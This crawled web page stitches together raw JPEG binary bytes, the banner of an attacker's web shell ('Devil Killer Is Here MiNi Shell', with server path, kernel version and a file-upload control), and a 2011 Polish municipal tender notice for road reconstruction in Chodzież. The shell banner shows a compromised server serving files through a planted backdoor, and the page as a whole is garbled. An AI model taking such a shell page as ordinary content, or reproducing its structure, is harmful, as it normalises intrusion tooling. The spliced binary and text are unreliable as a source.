JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/429536-N-2011.html

<p class="kh_header"><b>Chodzież: Przebudowa sieci dróg gminnych i powiatowych w Chodzieży, celem aktywizacji obszarów miejskich i zwiększenia bezpieczeństwa ruchu drogowego</b><br>
<b>Numer ogłoszenia: 429536 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska w Chodzieży , ul. Paderewskiego 2, 64-800 Chodzież, woj. wielkopolskie, tel. 067 2827171, faks 067 2827232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chodziez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa sieci dróg gminnych i powiatowych w Chodzieży, celem aktywizacji obszarów miejskich i zwiększenia bezpieczeństwa ruchu drogowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Przebudowa sieci dróg gminnych i powiatowych w Chodzieży celem aktywizacji obszarów miejskich i zwiększenia bezpieczeństwa ruchu drogowego
Przedmiotem zamówienia jest przebudowa i remont dróg gminnych i powiatowych na terenie miasta Chodzieży w ciągu ulic: Topolowej, Waryńskiego, Podgórnej (drogi gminne o łącznej długości 1.916,70 m) oraz Kochanowskiego, Żeromskiego, Marcinkowskiego i Kościuszki (drogi powiatowe o łącznej długości 1.283 m). 
Drogi te zlokalizowane są w całości na terenie powiatu chodzieskiego i leżą w Gminie Miejskiej w Chodzieży. Długość liniowa ciągu dróg wynosi łącznie 3.199,70 m.
Zakres robót obejmuje swym zasięgiem skrzyżowanie ulic Marcinkowskiego, Kościuszki i Składową i dalej ulicy Marcinkowskiego, Żeromskiego, Kochanowskiego, Podgórnej, Waryńskiego i Topolowej (łączącej się z drogą krajową nr 11 Kołobrzeg- Bytom).
Obecnie ulice te posiadają różnorodną nawierzchnię od gruntowej, poprzez tłuczniową i brukową do bitumicznej o różnej szerokości od 4,00 m do 8,10 m. Na ulicach występują częściowo krawężniki i chodniki, część z nich jest w złym stanie i należy je rozebrać i ustawić nowe. Stan techniczny jezdni jest zły - występują liczne nierówności, spękania siatkowe, ubytki czy np. zaniżenia z zastoiskami wody. Istniejące skrzyżowanie ulic Marcinkowskiego,Składowej, Kościuszki jest skrzyżowaniem zwykłym, nieskanalizowanym, z istniejącą pośrodku nieforemną wyspą spełniającą rolę rozdziału ruchu, dzielącą ul. Kościuszki na 2 pasy. Wykonanie robót w obrębie skrzyżowania pozwoli na wprowadzenie zmiany organizacji ruchu na bazie istniejącej wysepki, co znacząco wpłynie na bezpieczeństwo ruchu drogowego. 
Przebudowa i remont sieci dróg gminnych i powiatowych w mieście Chodzież polegać ma na poprawie równości nawierzchni, polepszeniu odwodnienia jezdni oraz zwiększeniu standardu przejazdu i poprawieniu bezpieczeństwa ruchu drogowego poprzez wykonanie właściwego oznakowania pionowego i poziomego, wprowadzenie nowej organizacji ruchu kołowego polegającego na ruchu okrężnym. 
Zakresem postępowania objęte są następujące działania na w/w drogach gminnych i powiatowych:
remont i przebudowa dróg,
budowa, przebudowa chodników, 
nawierzchni zjazdów, pasów postojowych oraz zatok autobusowych,
zagospodarowanie poboczy,
przebudowa kanalizacji deszczowej,
budowa separatora wód opadowych,
przebudowa oświetlenia drogowego,
przebudowa skrzyżowania ulic: Marcinkowskiego, Kościuszki, Składowej - wprowadzenie nowej organizacji ruchu kołowego, polegającego na ruchu okrężnym,
urządzenia bezpieczeństwa ruchu: przejścia dla pieszych, oznakowanie poziome i pionowe,
remont nawierzchni jezdni i chodników oraz poręczy i barier w obrębie wiaduktu.
W realizacji powyższego zamówienia Gmina Miejska w Chodzieży pełni rolę lidera projektu, a rolę partnera pełni Powiat Chodzieski.

Zakres nr 1 obejmuje wykonanie robót budowlanych polegających na przebudowie chodników i wymianie nawierzchni jezdni ulic Kościuszki, Marcinkowskiego, Żeromskiego i Kochanowskiego w Chodzieży wraz ze zmianą organizacji ruchu na skrzyżowaniu ulic Marcinkowskiego, Kościuszki i Składowej. Wielkości i rodzaje robót określone w dokumentacji technicznej oraz specyfikacji technicznej.
Zakres 2 obejmuje:
1)      Przebudowa oświetlenia drogowego w ul. Topolowej, Waryńskiego, Marcinkowskiego, Kochanowskiego w Chodzieży obejmuje montaż linii kablowej oraz latarni oświetlenia ulicznego o słupach ocynkowanych, cylindrycznym okrągłych S-90 na fundamencie z oprawami 100W na wysięgniku W-1,0m - 20 szt i  150W na wysięgniku W-1,5m - 23szt
2)      Wymiana opraw oświetlenia drogowego na ulicy Kochanowskiego, Topolowej, Podgórnej i Żeromskiego w Chodzieży wraz z wysięgnikami - 48 szt.
3)      Przebudowa kanalizacji deszczowej w ul. Podgórnej, Kochanowskiego, Żeromskiego, Marcinkowskiego w Chodzieży obejmuje: kanał z rur PVC o 500 - 46,50m, kanał z rur PVC o 400 - 211,50m, kanał z rur PVC o 315 - 651,50m, kanał z rur PVC o 250 - 230,50m, kanał z rur PVC o 200 - 127,00m, kanał z rur PVC o 160 - 129,50m, studnie betonowe o 1000 - 32szt, studzienki ściekowe o 500 - 69szt
4)      Przebudowa odcinka kanalizacji deszczowej oraz montaż separatora wód roztopowych w ul. Podgórnej, obejmującej: kanał z rur PVC o500 klasy Sn8 - 97,50m, kanał z rur PVC  o400 klasy SN8 - 22,00m, kanał z rur PVC o250/7,3 o ściance jednolitej klasy S - 5,00m, kanał z rur PVC o 200/5,9 o ściance jednolitej, klasy S - 10,00m, kanał z rur PVC o 160/4,7 o ściance jednolitej, klasy S - 31,00m, betonowe studnie rewizyjne o 1200 - 5 szt, betonowe studnie rewizyjne o 1000 - 1 szt,  montaż separatora w zbiornik o 2300, montaż osadnika V= 4m3 z zbiorniku o 2300, studnia rewizyjna o 1200.
5)      Przebudowa dróg gminnych: nr 188409P - ul. Podgórna od km. 0+616,4 do km. 0+729,8 nr188407P - ul. Waryńskiego od km. 0+000,0 do km. 0+503,0 nr188207P - ul. Topolowa od km. 0+291,7 do km. 0+760,6 obejmuje:
a) wykonanie ulic jedno jezdniowych z dwoma pasami ruchu na powierzchni około 6400 m2
- kategoria ruchu - KR 3
- warstwa ścieralna o grub. 4 cm - masa SMA o module sztywności 16,0 MPA
-warstwa wiążąca o gr.12 cm - beton asfaltowy o module sztywności 16,0 MPa
-podbudowa zasadnicza o gr. 20 cm - chudy beton
-warstwa odcinająca o gr. 10 cm - materiał dobrze przepuszczający wodę
b) wykonanie zjazdów z betonowej kostki brukowej na powierzchni około 650 m2
- warstwa ścieralna z kostki gr. 8 cm, fazowana o zabarwieniu grafitowym kl. I, gat. I
- podsypka cementowo-piaskowa 1:4, o grub. 3 cm
- podbudowa zasadnicza o gr. 15 cm - chudy beton
- warstwa odcinająca o grub. 10 cm - materiał dobrze przepuszczający wodę
c) wykonanie ciągów pieszo-rowerowych z betonowej kostki brukowej na pow. około 1200 m2
- warstwa ścieralna z kostki gr. 8 cm, bezfazowanej w kolorze czerwonym kl. I, gat. I
- podsypka cem.-piask. 1:4 o gr.3 cm
- podbudowa zasadnicza o gr. 10 cm - chudy beton
- warstwa odcinająca o gr. 10 cm - materiał dobrze przepuszczający wodę
d) wykonanie chodników z betonowej kostki brukowej na powierzchni około 600 m2
- warstwa ścieralna z kostki gr. 6 cm w kolorze szarym kl. I, gat. I
- podsypka cem.-piask. 1:4, o gr. 3 cm
- warstwa odcinająca o gr. 10 cm - materiał dobrze przepuszczający wodę
e) karczowanie pni drzew po wycince o śred od 30 cm do 60 cm w ilości około 70 szt
f) budowle do odbioru wód opadowych
g) wykonanie trawników siewem na pow. około 1400 m2
6)      Remont dróg gminnych: nr 188409P-ul.Podgórna od km. 0+009,4 do km 0+616,4 oraz nr 188207P-ul.Topolowa od km. 0+052,8 do km. 291,7 obejmuje:
a) remont ulic jedno jezdniowych z dwoma pasami ruchu na powierzchni około 5700 m2
- wyrównanie betonem asfaltowym w ilości około230 Mg
- warstwy wiążące z mieszanek min.-asf. dla KR 3 o gr. 12 cm na pow. około 1600 m2  
- warstwa ścieralna o gr 4 cm - masa SMA dla Kr 3 na pow. około 5700m2
b) wykonanie zjazdów z betonowej kostki brukowej na pow. około 1020 m2
- warstwa ścieralna z kostki gr 8 cm fazowanej w kolorze grafitowym, kl. I, gat. I
- podsypka cem.-piask. 1:3 o gr 3 cm
- podbudowa zasadnicza o gr. 15 cm z chudego betonu
- warstwa odcinająca o gr 10 cm z materiałów przepuszczającego wodę
c) wykonanie ciągów pieszo-rowerowych z betonowej kostki brukowej na pow. około 500 m2
- warstwa ścieralna z kostki gr. 8 cm, bezfazowanej w kolorze czerwonym, kl. I, gat. I
- podsypka cem.-piask. 1:4, o gr. 3 cm
- podbudowa zasadnicza o grub 10 cm z chudego betonu
- warstwa odcinająca o gr. 10 cm z materiału dobrze przepuszczającego wodę
d) wykonanie chodników z betonowej kostki brukowej na powierzchni około 1600 m2
- warstwa ścieralna z kostki gr. 6 cm w kolorze szarym, kl. I, gat. I
- podsypka cem.-piask. 1:4 o grug. 3 cm
- podbudowa zasadnicza o grub. 10 cm z chudego betonu
- warstwa odcinająca o grub. 10 cm z materiału przepuszczającego wodę
e) montaż prefabrykowanych ścian oporowych typu T i L o powierzchni około 220m2
f) wykonanie trawników siewem na powierzchni około 1200m2
g) montaż urządzeń ochronnych  

 
Szczegółowo przedmiot zamówienia określono w Załączniku Nr 9 do Specyfikacji Istotnych Warunków  Zamówienia przy pomocy Specyfikacji Technicznych Wykonania i  Odbioru Robót oraz dokumentacji projektowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.31.28-2, 45.23.31.29-9, 45.23.32.20-7, 45.23.21.30-2, 45.23.32.22-1, 45.31.61.10-9, 45.23.14.00-9, 45.11.27.10-5, 77.21.14.00-6, 77.21.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 200 000,00 zł
(słownie: dwieście tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co najmniej 3 zadania związane z budową lub przebudową dróg, każde o wartości nie mniejszej niż 5 mln.PLN brutto.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  winien dysponować następującymi jednostkami sprzętu i środkami transportu wymienionymi w poniższej:
- Wytwórnia mas bitumicznych o wydajności nie mniejszej niż 100t/h, wyposażona w komputerowe sterowanie procesem technologicznym z automatycznym systemem dozowania składników, położona w takiej odległości od placu budowy, by czas transportu mieszanki bitumicznej od momentu załadunku w wytwórni do rozładunku na budowie nie przekroczył  2 godzin  (należy wskazać lokalizację wytwórni)- 1 szt;
- Układarka mas bitumicznych wyposażona w system automatycznej niwelacji układanej masy - 1 szt
- Zestaw sprzętu do zagęszczania mas bitumicznych- 1 szt
- Zestaw sprzętu do zagęszczania robót ziemnych i podbudów - 1 szt
- Dźwig  samojezdny -  1 szt
- Samojezdna koparka podsiębierna - 2 szt
- Samojezdna koparko- ładowarka - 1 szt
- Równiarka o mocy co najmniej 100 KW - 1 szt
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają warunek</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować  następującymi osobami posiadającymi doświadczenie i kwalifikacje
 -  kierownik budowy branży drogowej posiadającym uprawnienia budowlane o specjalności drogowej, który kierował   co najmniej 2 robotami o podobnym charakterze i złożoności 
-  kierownikiem robót branży elektrycznej  posiadającym uprawnienia w zakresie budowy sieci i instalacji urządzeń elektrycznych i elektroenergetycznych, który kierował co najmniej 2 robotami o podobnym charakterze i złożoności 
- kierownik robót branży instalacyjnej uprawnienia w zakresie budowy sieci i instalacji urządzeń sanitarnych, który kierował co najmniej 2 robotami o podobnym charakterze i złożoności 
Wykonawca przedłoży wykaz osób, które będą kierować robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, doświadczenia, oraz informację o podstawie do dysponowania tymi osobami. Wykonawca przedłoży wraz z ofertą oświadczenie, że dysponuje odpowiednim potencjałem technicznym a także osobami zdolnymi do wykonania zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać:
1) średnioroczne przychody netto ze sprzedaży za ostatnie 3 lata  (a jeżeli okres prowadzenia działalności jest krótszy - za ten okres) w wysokości nie mniejszej niż 5 mln PLN (słownie: pięć milionów złotych)w każdym z lat.
2) dysponowanie własnymi środkami finansowymi  lub zdolnością kredytową w wysokości nie mniejszej niż 5 mln PLN. (słownie: pięciu milionów złotych)
3) posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 5 mln zł (pięć milionów złotych).  
Wykonawca, którego oferta wybrana zostanie jako najkorzystniejsza, przed podpisaniem umowy przedłoży polisę lub inny dokument ubezpieczeniowy potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie niższą niż 5 mln PLN (słownie: pięć milionów złotych). 
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że  łącznie spełniają w/w warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
